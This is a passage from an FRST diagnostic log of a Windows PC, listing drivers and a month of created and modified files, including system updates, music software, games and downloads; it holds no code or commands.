R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-09] (Microsoft Corporation)
U3 aspnet_state; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-12-10 17:25 - 2015-12-10 17:25 - 02369024 _____ (Farbar) C:\Users\PimpSlap\Downloads\FRST64.exe
2015-12-10 17:25 - 2015-12-10 17:25 - 02369024 _____ (Farbar) C:\Users\PimpSlap\Desktop\FRST64.exe
2015-12-10 17:25 - 2015-12-10 17:25 - 00023624 _____ C:\Users\PimpSlap\Desktop\FRST.txt
2015-12-10 17:25 - 2015-12-10 17:25 - 00000000 ____D C:\FRST
2015-12-10 16:53 - 2015-12-10 16:53 - 00016148 _____ C:\WINDOWS\system32\PIMPSLAP-PC_PimpSlap_HistoryPrediction.bin
2015-12-09 18:20 - 2015-12-10 06:49 - 00000000 ____D C:\Users\PimpSlap\Desktop\Happy Holidays
2015-12-09 11:52 - 2015-12-09 11:54 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2015-12-09 11:51 - 2015-12-09 11:51 - 11069616 _____ (VS Revo Group ) C:\Users\PimpSlap\Downloads\RevoUninProSetup.exe
2015-12-09 11:51 - 2015-12-09 11:51 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\PimpSlap\Downloads\revosetup.exe
2015-12-09 11:49 - 2015-12-09 11:49 - 00000000 ____D C:\Users\PimpSlap\Downloads\Mirillis Action! 1.29.0 Multilingual  + Key [4realtorrentz]
2015-12-09 11:44 - 2015-12-09 12:04 - 00000000 ____D C:\Program Files (x86)\Mirillis
2015-12-09 11:30 - 2015-12-09 11:32 - 21627584 _____ (Mirillis Ltd.) C:\Users\PimpSlap\Downloads\action_1_29_0_setup.exe
2015-12-09 11:25 - 2015-12-09 11:25 - 21277853 _____ C:\Users\PimpSlap\Downloads\Mirillis Action! 1.29.0 Multilingual  + Key [4realtorrentz].zip
2015-12-09 09:52 - 2015-12-09 09:52 - 00079174 _____ C:\Users\PimpSlap\Downloads\Cubano.zip
2015-12-09 09:28 - 2015-12-09 09:28 - 00002117 _____ C:\Users\PimpSlap\Desktop\FL Studio 11.lnk
2015-12-09 09:28 - 2015-12-09 09:28 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASIO4ALL v2
2015-12-09 09:28 - 2015-12-09 09:28 - 00000000 ____D C:\Program Files (x86)\VstPlugins
2015-12-09 09:28 - 2015-12-09 09:28 - 00000000 ____D C:\Program Files (x86)\ASIO4ALL v2
2015-12-09 09:27 - 2015-12-09 09:27 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\FlowStone
2015-12-09 09:27 - 2015-12-09 09:27 - 00000000 ____D C:\Program Files (x86)\DSPRobotics
2015-12-09 09:16 - 2015-11-24 21:33 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-12-09 09:16 - 2015-11-24 21:01 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-12-09 09:16 - 2015-11-24 20:44 - 21872640 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2015-12-09 09:16 - 2015-11-24 20:42 - 24592384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-12-09 09:16 - 2015-11-24 20:34 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-12-09 09:16 - 2015-11-24 20:23 - 19323392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-12-09 09:16 - 2015-11-24 20:23 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2015-12-09 09:16 - 2015-11-24 20:22 - 01717248 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2015-12-09 09:16 - 2015-11-24 20:22 - 01383424 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2015-12-09 09:16 - 2015-11-24 20:10 - 18801664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2015-12-09 09:16 - 2015-11-24 20:05 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-12-09 09:15 - 2015-11-30 23:01 - 02115936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2015-12-09 09:15 - 2015-11-30 22:03 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\gpuenergydrv.sys
2015-12-09 09:15 - 2015-11-30 21:54 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2015-12-09 09:15 - 2015-11-30 21:51 - 07523840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2015-12-09 09:15 - 2015-11-30 21:49 - 04792320 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-12-09 09:15 - 2015-11-30 21:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-12-09 09:15 - 2015-11-30 20:59 - 05455360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2015-12-09 09:15 - 2015-11-24 21:42 - 04532304 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-12-09 09:15 - 2015-11-24 21:42 - 00168288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.exe
2015-12-09 09:15 - 2015-11-24 21:41 - 01822280 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-12-09 09:15 - 2015-11-24 21:40 - 00516448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-12-09 09:15 - 2015-11-24 21:32 - 00113184 _____ (Microsoft Corporation) C:\WINDOWS\system32\userenv.dll
2015-12-09 09:15 - 2015-11-24 21:27 - 01366680 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2015-12-09 09:15 - 2015-11-24 21:12 - 04047288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-12-09 09:15 - 2015-11-24 21:11 - 01532984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-12-09 09:15 - 2015-11-24 21:09 - 01310880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2015-12-09 09:15 - 2015-11-24 20:59 - 00092992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\userenv.dll
2015-12-09 09:15 - 2015-11-24 20:49 - 01569280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2015-12-09 09:15 - 2015-11-24 20:49 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlanMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:49 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:49 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\system32\RasMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:48 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\EthernetMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:48 - 00126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:37 - 02350592 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-12-09 09:15 - 2015-11-24 20:36 - 01710592 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2015-12-09 09:15 - 2015-11-24 20:36 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2015-12-09 09:15 - 2015-11-24 20:35 - 00929792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2015-12-09 09:15 - 2015-11-24 20:35 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Magnify.exe
2015-12-09 09:15 - 2015-11-24 20:31 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAMM.dll
2015-12-09 09:15 - 2015-11-24 20:30 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3mm.dll
2015-12-09 09:15 - 2015-11-24 20:30 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rmcast.sys
2015-12-09 09:15 - 2015-11-24 20:30 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2015-12-09 09:15 - 2015-11-24 20:29 - 01649152 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2015-12-09 09:15 - 2015-11-24 20:29 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ninput.dll
2015-12-09 09:15 - 2015-11-24 20:28 - 00572928 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-12-09 09:15 - 2015-11-24 20:28 - 00523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvut.dll
2015-12-09 09:15 - 2015-11-24 20:27 - 02180608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2015-12-09 09:15 - 2015-11-24 20:26 - 00849408 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2015-12-09 09:15 - 2015-11-24 20:26 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2015-12-09 09:15 - 2015-11-24 20:25 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-12-09 09:15 - 2015-11-24 20:25 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll
2015-12-09 09:15 - 2015-11-24 20:23 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-12-09 09:15 - 2015-11-24 20:22 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2015-12-09 09:15 - 2015-11-24 20:22 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdgeoqw.dll
2015-12-09 09:15 - 2015-11-24 20:22 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZST.DLL
2015-12-09 09:15 - 2015-11-24 20:22 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZEL.DLL
2015-12-09 09:15 - 2015-11-24 20:22 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZE.DLL
2015-12-09 09:15 - 2015-11-24 20:19 - 01795584 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2015-12-09 09:15 - 2015-11-24 20:19 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2015-12-09 09:15 - 2015-11-24 20:18 - 01233920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2015-12-09 09:15 - 2015-11-24 20:17 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2015-12-09 09:15 - 2015-11-24 20:16 - 01442816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2015-12-09 09:15 - 2015-11-24 20:16 - 00786432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Magnify.exe
2015-12-09 09:15 - 2015-11-24 20:13 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-12-09 09:15 - 2015-11-24 20:11 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ninput.dll
2015-12-09 09:15 - 2015-11-24 20:10 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2015-12-09 09:15 - 2015-11-24 20:10 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-12-09 09:15 - 2015-11-24 20:10 - 00415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\catsrvut.dll
2015-12-09 09:15 - 2015-11-24 20:08 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2015-12-09 09:15 - 2015-11-24 20:07 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 01467392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\duser.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kbdgeoqw.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KBDAZST.DLL
2015-12-09 09:15 - 2015-11-24 20:04 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KBDAZEL.DLL
2015-12-09 09:15 - 2015-11-24 20:04 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KBDAZE.DLL
2015-12-09 09:15 - 2015-11-24 18:52 - 00775312 _____ C:\WINDOWS\SysWOW64\locale.nls
2015-12-09 09:15 - 2015-11-24 18:52 - 00775312 _____ C:\WINDOWS\system32\locale.nls
2015-12-09 09:13 - 2015-12-09 09:13 - 00064946 _____ C:\Users\PimpSlap\Downloads\RBNo2.zip
2015-12-09 09:11 - 2015-12-09 09:11 - 00010715 _____ C:\Users\PimpSlap\Downloads\Distant-Galaxy.zip
2015-12-08 19:19 - 2015-12-08 19:19 - 00039095 _____ C:\Users\PimpSlap\Downloads\neou.zip
2015-12-08 19:16 - 2015-12-08 19:16 - 00020186 _____ C:\Users\PimpSlap\Downloads\bebas_neue.zip
2015-12-08 19:09 - 2015-12-08 19:09 - 00053034 _____ C:\Users\PimpSlap\Downloads\batman_forever (1).zip
2015-12-07 20:23 - 2015-12-07 20:24 - 00000000 ____D C:\Users\PimpSlap\Downloads\FL Studio Producer Edition 11.0.4+Plugins Bundle R2R [ChingLiu]
2015-12-07 20:10 - 2015-12-07 20:10 - 00000000 ____D C:\Program Files\Common Files\VST2
2015-12-07 20:08 - 2015-12-09 09:27 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line
2015-12-07 20:08 - 2015-12-09 09:27 - 00000000 ____D C:\Program Files\Image-Line
2015-12-07 20:08 - 2015-12-07 20:08 - 00000000 ____D C:\Users\PimpSlap\Documents\Image-Line
2015-12-07 20:08 - 2015-12-07 20:08 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\Image-Line
2015-12-07 20:08 - 2015-12-07 20:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line
2015-12-07 20:00 - 2015-12-09 09:27 - 00000000 ____D C:\Program Files (x86)\Image-Line
2015-12-07 19:58 - 2015-12-07 20:00 - 517121104 _____ (Image-Line) C:\Users\PimpSlap\Downloads\flstudio_12.1.3.exe
2015-12-07 19:54 - 2015-12-07 19:57 - 71607327 _____ C:\Users\PimpSlap\Downloads\TheFatRat - Windfall.mp4
2015-12-07 19:50 - 2015-12-07 19:53 - 74450897 _____ C:\Users\PimpSlap\Downloads\Jamie Berry - Out of My Mind [Electro Swing].mp4
2015-12-05 23:28 - 2015-12-05 23:28 - 88657408 _____ (by dimabal100000) C:\Users\PimpSlap\Desktop\[0.9.12] Svatekl2 Mod Pack v10.3.exe
2015-12-05 23:26 - 2015-12-05 23:27 - 88657408 _____ (by dimabal100000) C:\Users\PimpSlap\Downloads\[0.9.12] Svatekl2 Mod Pack v10.3.exe
2015-12-05 12:45 - 2015-12-06 13:10 - 00000000 ____D C:\Users\PimpSlap\Desktop\Pics
2015-12-04 15:23 - 2015-12-04 15:23 - 12079414 _____ C:\Users\PimpSlap\Downloads\MUCH WOW.ai
2015-12-02 16:53 - 2015-12-05 15:07 - 00000327 _____ C:\Users\PimpSlap\Desktop\Minecraft Cords.txt
2015-11-29 17:44 - 2015-11-29 17:44 - 36976874 _____ (Igor Pavlov) C:\Users\PimpSlap\Downloads\mcedit2-win64-2.0.0alpha-907 (1).exe
2015-11-29 17:25 - 2015-11-29 17:25 - 30716779 _____ (Igor Pavlov) C:\Users\PimpSlap\Downloads\mcedit2-win64-2.0.0alpha-823.exe
2015-11-29 17:25 - 2015-11-23 05:09 - 00000000 ____D C:\Users\PimpSlap\Downloads\mcedit2-win64-2.0.0alpha-907
2015-11-29 17:24 - 2015-11-29 17:25 - 36976874 _____ (Igor Pavlov) C:\Users\PimpSlap\Downloads\mcedit2-win64-2.0.0alpha-907.exe
2015-11-28 16:35 - 2015-11-28 16:36 - 00000000 ____D C:\Users\PimpSlap\Downloads\Underdogs.2013.DUBBED.DVDRip.x264-PHOBOS[et]
2015-11-28 13:44 - 2015-11-28 13:44 - 88363008 _____ (by dimabal100000) C:\Users\PimpSlap\Downloads\[0.9.12] svatekl2 mod pack v10.2.exe
2015-11-27 10:27 - 2015-11-27 10:28 - 03317784 _____ C:\Users\PimpSlap\Downloads\HeroesAndGenerals-setup-111463.exe
2015-11-22 18:16 - 2015-11-22 18:18 - 88240640 _____ (by dimabal100000) C:\Users\PimpSlap\Downloads\[0.9.12] Svatekl2 Mod Pack v10.1.exe
2015-11-21 16:10 - 2015-12-01 17:51 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\CDisplayEx
2015-11-21 16:10 - 2015-11-21 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CDisplayEx
2015-11-21 16:10 - 2015-11-21 16:10 - 00000000 ____D C:\Program Files\CDisplayEx
2015-11-21 15:29 - 2015-11-21 15:29 - 07151352 _____ (Progdigy Software S.A.R.L. ) C:\Users\PimpSlap\Downloads\CDisplayExWin64v1.10.29.exe
2015-11-21 15:19 - 2015-11-21 15:19 - 00000000 ____D C:\Users\PimpSlap\Downloads\Witchking00 - Adventure Time 1-3
2015-11-21 15:17 - 2015-11-21 15:19 - 00000000 ____D C:\Users\PimpSlap\Downloads\Witchking00 - The Mystic Pokemon + DragonBall - The Lost Chapter
2015-11-21 15:17 - 2015-11-21 15:18 - 00000000 ____D C:\Users\PimpSlap\Downloads\Witchking00 - April O'Neil 1-2
2015-11-21 15:17 - 2015-11-21 15:17 - 00000000 ____D C:\Users\PimpSlap\Downloads\WitchKing00 The Red Splinter (Adventure Time)
2015-11-21 15:17 - 2015-11-21 15:17 - 00000000 ____D C:\Users\PimpSlap\Downloads\Witchking00 - The Legend of Korra 1-2
2015-11-20 16:39 - 2015-11-20 16:39 - 87617536 _____ (by dimabal100000) C:\Users\PimpSlap\Downloads\[0.9.12] Svatekl2 Mod Pack v10.0.exe
2015-11-13 11:23 - 2015-11-13 11:23 - 00001161 _____ C:\Users\PimpSlap\Desktop\Fallout4Launcher - Shortcut.lnk
2015-11-12 19:30 - 2015-11-16 16:20 - 00001135 _____ C:\Users\PimpSlap\Desktop\Fallout4 - Shortcut.lnk
2015-11-12 19:30 - 2015-11-12 19:37 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\Fallout4
2015-11-12 19:23 - 2015-11-12 19:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Fallout 4
2015-11-12 18:56 - 2015-11-12 18:56 - 00070656 _____ C:\Users\PimpSlap\Downloads\GTAV Date Launcher.exe
2015-11-12 15:24 - 2015-11-12 15:24 - 00191787 _____ C:\Users\PimpSlap\Downloads\Unconfirmed 710115.crdownload
2015-11-12 15:23 - 2015-11-12 15:23 - 00187929 _____ C:\Users\PimpSlap\Downloads\GTA V Fixes (2).zip
2015-11-12 15:23 - 2015-11-12 15:23 - 00187929 _____ C:\Users\PimpSlap\Downloads\GTA V Fixes (1).zip
2015-11-12 15:21 - 2015-11-12 15:22 - 00187929 _____ C:\Users\PimpSlap\Downloads\GTA V Fixes.zip
2015-11-12 15:16 - 2015-11-12 16:59 - 00000000 ____D C:\Users\PimpSlap\Downloads\Fallout.4-CODEX
2015-11-12 12:32 - 2015-11-12 12:32 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\Grand Theft Auto V
2015-11-12 12:32 - 2015-04-06 18:40 - 00002276 _____ C:\Users\PimpSlap\Desktop\Grand Theft Auto V.lnk
2015-11-11 17:10 - 2015-11-11 17:10 - 00259979 _____ C:\Users\PimpSlap\Downloads\XRay-4.4.jar
2015-11-11 16:42 - 2015-11-11 16:42 - 00004563 _____ C:\Users\PimpSlap\AppData\Roaming\CamStudio.cfg
2015-11-11 16:42 - 2015-11-11 16:42 - 00000408 _____ C:\Users\PimpSlap\AppData\Roaming\CamShapes.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 00000408 _____ C:\Users\PimpSlap\AppData\Roaming\CamLayout.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 00000161 _____ C:\Users\PimpSlap\AppData\Roaming\Camdata.ini
2015-11-11 16:21 - 2015-11-11 16:22 - 11438475 _____ (CamStudio Open Source ) C:\Users\PimpSlap\Downloads\CamStudio_Setup_2-7_r316 (1).exe
2015-11-11 16:19 - 2015-11-11 16:20 - 00376680 _____ (CamStudio Open Source ) C:\Users\PimpSlap\Downloads\CamStudio_Setup_2-7_r316.exe
2015-11-11 15:25 - 2015-11-11 15:45 - 287790583 _____ C:\Users\PimpSlap\Downloads\Sponge (1).zip
2015-11-11 15:16 - 2015-11-11 15:17 - 19496960 _____ C:\Users\PimpSlap\Downloads\Sponge.zip
2015-11-10 16:42 - 2015-11-10 16:42 - 00031843 _____ C:\Users\PimpSlap\Downloads\torrent
2015-11-10 16:34 - 2015-11-10 16:34 - 592570531 _____ C:\Users\PimpSlap\Downloads\Grand.Theft.Auto.V.Update.6(v1.0.372.2).and.Crack.v5-3DM.and.Crack.v1-RELOADED.rar
2015-11-10 16:20 - 2015-11-04 21:15 - 00541024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2015-11-10 16:20 - 2015-11-04 21:13 - 00577888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2015-11-10 16:20 - 2015-11-04 21:11 - 01392480 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2015-11-10 16:20 - 2015-11-04 20:56 - 01083072 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-11-10 16:20 - 2015-11-04 20:56 - 00025280 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-11-10 16:20 - 2015-11-04 20:30 - 00961376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2015-11-10 16:20 - 2015-11-04 20:18 - 03248128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2015-11-10 16:20 - 2015-11-04 20:17 - 02418688 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2015-11-10 16:20 - 2015-11-04 20:10 - 02987520 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2015-11-10 16:20 - 2015-11-04 20:07 - 01068032 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-11-10 16:20 - 2015-11-04 20:05 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-11-10 16:20 - 2015-11-04 19:59 - 02675200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2015-11-10 16:20 - 2015-11-04 19:58 - 00627712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2015-11-10 16:20 - 2015-11-04 19:54 - 00502272 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2015-11-10 16:20 - 2015-11-04 19:42 - 02647040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2015-11-10 16:20 - 2015-11-04 19:40 - 01918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2015-11-10 16:20 - 2015-11-04 19:35 - 02639872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2015-11-10 16:20 - 2015-11-04 19:33 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-11-10 16:20 - 2015-11-04 19:27 - 02049536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2015-11-10 16:20 - 2015-11-04 19:23 - 00441344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2015-11-10 16:19 - 2015-11-04 21:15 - 08020832 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-11-10 16:19 - 2015-11-04 21:14 - 00459104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2015-11-10 16:19 - 2015-11-04 21:06 - 00966416 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2015-11-10 16:19 - 2015-11-04 21:01 - 00607408 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2015-11-10 16:19 - 2015-11-04 20:56 - 00116064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2015-11-10 16:19 - 2015-11-04 20:23 - 00762888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2015-11-10 16:19 - 2015-11-04 20:23 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2015-11-10 16:19 - 2015-11-04 20:18 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2015-11-10 16:19 - 2015-11-04 20:12 - 00515072 _____ (Microsoft Corporation) C:\WINDOWS\system32\internetmail.dll
2015-11-10 16:19 - 2015-11-04 20:11 - 00333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2015-11-10 16:19 - 2015-11-04 20:06 - 00453120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2015-11-10 16:19 - 2015-11-04 20:05 - 00826880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-11-10 16:19 - 2015-11-04 20:03 - 01015808 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2015-11-10 16:19 - 2015-11-04 20:01 - 00949760 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-11-10 16:19 - 2015-11-04 20:01 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2015-11-10 16:19 - 2015-11-04 20:01 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2015-11-10 16:19 - 2015-11-04 19:55 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2015-11-10 16:19 - 2015-11-04 19:34 - 00311296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2015-11-10 16:19 - 2015-11-04 19:33 - 00650240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-11-10 16:19 - 2015-11-04 19:30 - 00767488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-11-10 16:19 - 2015-11-04 19:27 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-12-10 17:25 - 2015-10-30 15:15 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d11368d9c6141c.job
2015-12-10 17:25 - 2015-07-10 01:47 - 00000000 ____D C:\Windows
2015-12-10 17:25 - 2014-12-26 11:35 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-10 17:23 - 2015-03-26 19:01 - 00007608 _____ C:\Users\PimpSlap\AppData\Local\resmon.resmoncfg
2015-12-10 16:48 - 2015-07-14 20:29 - 00000000 ____D C:\Users\PimpSlap\AppData\LocalLow\Heroes and Generals
2015-12-10 16:42 - 2015-10-11 13:30 - 00000000 ____D C:\Users\PimpSlap
2015-12-10 15:25 - 2015-10-30 15:15 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore1d11368d9784eb7.job
2015-12-10 15:07 - 2015-07-14 15:52 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\TS3Client
2015-12-10 14:56 - 2015-07-30 14:42 - 00000000 ___HD C:\Program Files\WindowsApps
2015-12-10 14:56 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-12-10 14:53 - 2015-07-14 16:38 - 00000000 ____D C:\WarThunder
2015-12-10 14:47 - 2015-10-11 13:46 - 00917952 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-12-10 14:47 - 2015-07-30 14:40 - 00000000 ____D C:\WINDOWS\INF
2015-12-10 14:47 - 2015-07-22 22:31 - 00000000 ____D C:\ProgramData\boost_interprocess
2015-12-10 14:45 - 2015-10-13 17:08 - 00050688 _____ C:\WINDOWS\system32\IngameScript.dll
2015-12-10 14:44 - 2015-07-29 17:58 - 00005120 _____ C:\WINDOWS\system32\_StatLogic
